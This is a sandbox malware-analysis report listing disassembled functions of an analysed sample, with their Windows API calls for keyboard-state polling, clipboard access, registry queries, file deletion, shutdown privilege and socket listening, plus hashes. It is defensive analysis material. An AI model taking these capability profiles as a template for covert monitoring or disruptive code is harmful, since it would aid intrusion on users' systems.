Function 0064A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0064A20F
__swprintf.LIBCMT ref: 0064A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0064A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0064A293
_memset.LIBCMT ref: 0064A2B2
_wcsncpy.LIBCMT ref: 0064A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0064A323
CloseHandle.KERNEL32(00000000), ref: 0064A32E
RemoveDirectoryW.KERNEL32(?), ref: 0064A337
CloseHandle.KERNEL32(00000000), ref: 0064A341

Strings

\, xrefs: 0064A247
:, xrefs: 0064A252
\??\%s, xrefs: 0064A22B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 73f19ad42c9cd31c106209b091f5c0667ae9a74917d2010cab6d1f52e71fea74
Instruction ID: 0daedb193711ec338266bb0264ca13311bd9d0d50b7edf71a99dd6749e0b75ba
Opcode Fuzzy Hash: 73f19ad42c9cd31c106209b091f5c0667ae9a74917d2010cab6d1f52e71fea74
Instruction Fuzzy Hash: 1831B2B1540109BBDB219FA0DC49FEB77BEEF89740F1041B6F508D2260EBB197448B65

Function 0064001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00640097
SetKeyboardState.USER32(?), ref: 00640102
GetAsyncKeyState.USER32(000000A0), ref: 00640122
GetKeyState.USER32(000000A0), ref: 00640139
GetAsyncKeyState.USER32(000000A1), ref: 00640168
GetKeyState.USER32(000000A1), ref: 00640179
GetAsyncKeyState.USER32(00000011), ref: 006401A5
GetKeyState.USER32(00000011), ref: 006401B3
GetAsyncKeyState.USER32(00000012), ref: 006401DC
GetKeyState.USER32(00000012), ref: 006401EA
GetAsyncKeyState.USER32(0000005B), ref: 00640213
GetKeyState.USER32(0000005B), ref: 00640221

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: dc1be5b4f1173eecee486a212440d65fdb16657c1257690974bfd277d3e3603b
Instruction ID: 25f2243bad3936aa3a70a183d182a500c3af11ff471bd4f2c7fe2428c5fc4cd5
Opcode Fuzzy Hash: dc1be5b4f1173eecee486a212440d65fdb16657c1257690974bfd277d3e3603b
Instruction Fuzzy Hash: D951EE3090479829FB35DBB088547EABFB69F01780F08459DD6C25B6C3DAB49B8CCB61

Function 006603DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00660E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065FDAD,?,?), ref: 00660E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006604AC

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0066054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006605E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00660822
RegCloseKey.ADVAPI32(00000000), ref: 0066082F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 3b517b8346bc322b5ae69e6d38a339504af6af676f7c9a9025e2e11872c9d228
Instruction ID: ea83b61a20bed16e225762054ed1db4dcbad37fdfae60b0df3b5755b201b4aed
Opcode Fuzzy Hash: 3b517b8346bc322b5ae69e6d38a339504af6af676f7c9a9025e2e11872c9d228
Instruction Fuzzy Hash: 75E14C71204205AFDB14DF25C895E6BBBE9FF89314F04856DF88ADB261DA31ED01CB91

Function 006583BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC

CoInitialize.OLE32 ref: 00658403
CoUninitialize.OLE32 ref: 0065840E
CoCreateInstance.OLE32(?,00000000,00000017,00672BEC,?), ref: 0065846E
IIDFromString.OLE32(?,?), ref: 006584E1
VariantInit.OLEAUT32(?), ref: 0065857B
VariantClear.OLEAUT32(?), ref: 006585DC

Strings

NULL Pointer assignment, xrefs: 006584B3
Invalid parameter, xrefs: 006584FA
Failed to create object, xrefs: 00658479, 0065852F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: b4389a6d066ea85dcbe0ebdf69dff32e8be41bffd723f3325746c015155ecf49
Instruction ID: db63f73d2277769f55f0c1bf78e51e4f5f33e6d5db0a5898016476d8ddf8e1b9
Opcode Fuzzy Hash: b4389a6d066ea85dcbe0ebdf69dff32e8be41bffd723f3325746c015155ecf49
Instruction Fuzzy Hash: 2F61BC706083129FC710DF14C848B6ABBEAAF89755F00445DFD86AB6A1DB70ED49CB92

Function 00654164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0065418B
EmptyClipboard.USER32 ref: 00654191
GlobalAlloc.KERNEL32(00000002,?), ref: 006541A6
CloseClipboard.USER32 ref: 00654245

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 2e717229d6bf85db0bed7948f822a260fff53f8587319b9536ca12ab52fc121f
Instruction ID: 2dc51c3978f0b9262d068b3bbc7b6e0e32fc67f663f6bbfe8a4958227c4b7c39
Opcode Fuzzy Hash: 2e717229d6bf85db0bed7948f822a260fff53f8587319b9536ca12ab52fc121f
Instruction Fuzzy Hash: 4C21D3352006119FDB10AF60EC09B6D7BAAFF44751F108069F986DB2B1CBB0AD41CB95

Function 006437EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770

Part of subcall function 00644A31: GetFileAttributesW.KERNEL32(?,0064370B), ref: 00644A32

FindFirstFileW.KERNEL32(?,?), ref: 006438A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0064394B
MoveFileW.KERNEL32(?,?), ref: 0064395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0064397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0064399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 006439B9

Strings

\*.*, xrefs: 0064384E, 00643857, 0064386C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: ddf297d9c6341caac0e6dd3b25eb3a74fb5c48a13a2a4f04a84bdc01aea3bfff
Instruction ID: 38e0eb176b73fb3b72e26a6616894b63ca03a388de4baa0954df1c6b97934425
Opcode Fuzzy Hash: ddf297d9c6341caac0e6dd3b25eb3a74fb5c48a13a2a4f04a84bdc01aea3bfff
Instruction Fuzzy Hash: 7751B33180419D9ACF09EFA1D9969EDBB7ABF54304F600069F446B7292EF716F09CB50

Function 0064F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0064F440
Sleep.KERNEL32(0000000A), ref: 0064F470
_wcscmp.LIBCMT ref: 0064F484
_wcscmp.LIBCMT ref: 0064F49F
FindNextFileW.KERNEL32(?,?), ref: 0064F53D
FindClose.KERNEL32(00000000), ref: 0064F553

Strings

*.*, xrefs: 0064F425

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 129070a14bed1b889613a626ad3c1a5579dfaf5039321daa096a75cf352feba5
Instruction ID: 6f111bf4aca8ec481fceaa5c180d50292d711ef41f33f78643ab0d31af9fdca3
Opcode Fuzzy Hash: 129070a14bed1b889613a626ad3c1a5579dfaf5039321daa096a75cf352feba5
Instruction Fuzzy Hash: F141817190025AAFCF18DF64DC49AEEBBBAFF15310F104466E815A3291EB309E55CF90

Function 005F3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3c_, xrefs: 005F3225
__, xrefs: 005F3322

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c_$__
API String ID: 674341424-43384800
Opcode ID: ed81038c2ddda97d84ad4b8211bd8fded093bfb0c9478620b3fbbd323570ca83
Instruction ID: d089231c42d24155e9bde96e1967eda67dcd8d4401d442238fc08a6baa495a6e
Opcode Fuzzy Hash: ed81038c2ddda97d84ad4b8211bd8fded093bfb0c9478620b3fbbd323570ca83
Instruction Fuzzy Hash: 2922BC716083459FDB24DF14C885BAFBBE5BF84310F00492DFA9A97291DB35E904CB92

Function 005F5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005F58A5
_memmove.LIBCMT ref: 005F58F5
_memmove.LIBCMT ref: 005F595B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5cf209db7016ccb8e980702e90ef670a11a8276fc7f0dbc850ee304e7e1e9886
Instruction ID: ce01f73b21ec4cb1084cf8b9ccee77cc55a5820cb6eb31d47c6f0d4cd1040068
Opcode Fuzzy Hash: 5cf209db7016ccb8e980702e90ef670a11a8276fc7f0dbc850ee304e7e1e9886
Instruction Fuzzy Hash: BE12AD70A00609DFDF08DFA5D995AEEBBF6FF48300F104529E546E7290EB39A915CB50

Function 00643B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E4743,?,?,005E37AE,?), ref: 005E4770

Part of subcall function 00644A31: GetFileAttributesW.KERNEL32(?,0064370B), ref: 00644A32

FindFirstFileW.KERNEL32(?,?), ref: 00643B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00643BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00643BEA
FindClose.KERNEL32(00000000), ref: 00643C01
FindClose.KERNEL32(00000000), ref: 00643C0A

Strings

\*.*, xrefs: 00643B5B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 0806407e47b9191f42bcd252873f62c8722f12cbf06faf03b2158b4d9e69f778
Instruction ID: df6455f67ddb42e36c881bcc875e3c0280fa94bc61c5195b723a4cbb6626d949
Opcode Fuzzy Hash: 0806407e47b9191f42bcd252873f62c8722f12cbf06faf03b2158b4d9e69f778
Instruction Fuzzy Hash: 5D3170310083D69BC305EF64D8959EFBBADBE95304F404D2DF4D592291EB219A09CB97

Function 006451BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 006387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
Part of subcall function 006387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
Part of subcall function 006387E1: GetLastError.KERNEL32 ref: 00638865

ExitWindowsEx.USER32(?,00000000), ref: 006451F9

Strings

@, xrefs: 006451EC
SeShutdownPrivilege, xrefs: 006451C9
, xrefs: 006451E7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 1cbb99ea929e93ff9d78a185ddca76e7bd6f1e0a823eeb295600fd4c05382217
Instruction ID: 95887288be31cf8f91fa2e6bda3c2c28ab7f43a84175cc8664e28b1e9a215a59
Opcode Fuzzy Hash: 1cbb99ea929e93ff9d78a185ddca76e7bd6f1e0a823eeb295600fd4c05382217
Instruction Fuzzy Hash: 1601F2316A16116BEB2867B8AC9AFFB725AEB05740F200426F913E26D3DAD15E0185A4

Function 00656283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006562DC
WSAGetLastError.WSOCK32(00000000), ref: 006562EB
bind.WSOCK32(00000000,?,00000010), ref: 00656307
listen.WSOCK32(00000000,00000005), ref: 00656316
WSAGetLastError.WSOCK32(00000000), ref: 00656330
closesocket.WSOCK32(00000000,00000000), ref: 00656344

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: e7d18239099f7850b3baed6c9277b185604c51ecfeb07597839b0c3a3a1b70ef
Instruction ID: 2a1b32580b08cb120925c6e69daf2fd563abfbf81bcd1b73bda8f7fd916b5ccf
Opcode Fuzzy Hash: e7d18239099f7850b3baed6c9277b185604c51ecfeb07597839b0c3a3a1b70ef
Instruction Fuzzy Hash: 9621D2316002009FCB00EF64DC49A6EBBBAFF84321F548168FC56A7391CBB0AD05CB91

Function 005F5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01

_memmove.LIBCMT ref: 00630258
_memmove.LIBCMT ref: 0063036D
_memmove.LIBCMT ref: 00630414

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 6e67182118cdc41a4128572ac3d6401b291bc707108f851b075c7f30c9a8fc15
Instruction ID: 5a4a88a4b47563fe76fe83029fccbf1e305b993ad992d84d0f0d86c2baee3844
Opcode Fuzzy Hash: 6e67182118cdc41a4128572ac3d6401b291bc707108f851b075c7f30c9a8fc15
Instruction Fuzzy Hash: 3602CF70A00209DBDF08DF64D995ABEBBF6FF44300F148069E90ADB295EB34DA54CB95

Function 005E1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 005E19FA
GetSysColor.USER32(0000000F), ref: 005E1A4E
SetBkColor.GDI32(?,00000000), ref: 005E1A61

Part of subcall function 005E1290: DefDlgProcW.USER32(?,00000020,?), ref: 005E12D8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 9de142b673a7e45f653b96eda03a802fed43b394a9cd013f5ad0b4d52152b98b
Instruction ID: 717a8680346cf6e9cbdb91bae1fdfa8d28bf63eea126ade0194d8372378ae77c
Opcode Fuzzy Hash: 9de142b673a7e45f653b96eda03a802fed43b394a9cd013f5ad0b4d52152b98b
Instruction Fuzzy Hash: 5CA10471102DD4BAD72CAE3A8C48DFF2E5FFB42341B181929F582D5292CA349D4196FE

Function 00656747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00657D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00657DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0065679E
WSAGetLastError.WSOCK32(00000000), ref: 006567C7
bind.WSOCK32(00000000,?,00000010), ref: 00656800
WSAGetLastError.WSOCK32(00000000), ref: 0065680D
closesocket.WSOCK32(00000000,00000000), ref: 00656821

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 52fe9be1c67f6cca37a8c151c3c20b5fe11b6de50748add1b778c2322fdb1982
Instruction ID: 11eb3906207c9f672441f369bdccedc1c75ead75695976fb3f9e331611700cc9
Opcode Fuzzy Hash: 52fe9be1c67f6cca37a8c151c3c20b5fe11b6de50748add1b778c2322fdb1982
Instruction Fuzzy Hash: E741E6756002046FDB54AF25DC8AF7E7BA9EF88714F44846CF999AB3D2CA709D008791

Function 00665376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006653C5
IsWindowEnabled.USER32 ref: 006653D3
GetForegroundWindow.USER32(?,?,00000001), ref: 006653E0
IsIconic.USER32 ref: 006653EE
IsZoomed.USER32 ref: 006653FC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: e17d1183bf1bced646c6f4d6174bbdc4c0713809d66184a8848372f27d78a32d
Instruction ID: bbbd474b5d5386af80bc243316eb0cae9c44cab1cd84b8b57d55846f71203175
Opcode Fuzzy Hash: e17d1183bf1bced646c6f4d6174bbdc4c0713809d66184a8848372f27d78a32d
Instruction Fuzzy Hash: 5811B2713009116BEB216F26EC49A6B7B9AFF94BA1F404029F847E7351DBB09C0186A5

Function 006380A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006380C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006380CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006380D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006380E0
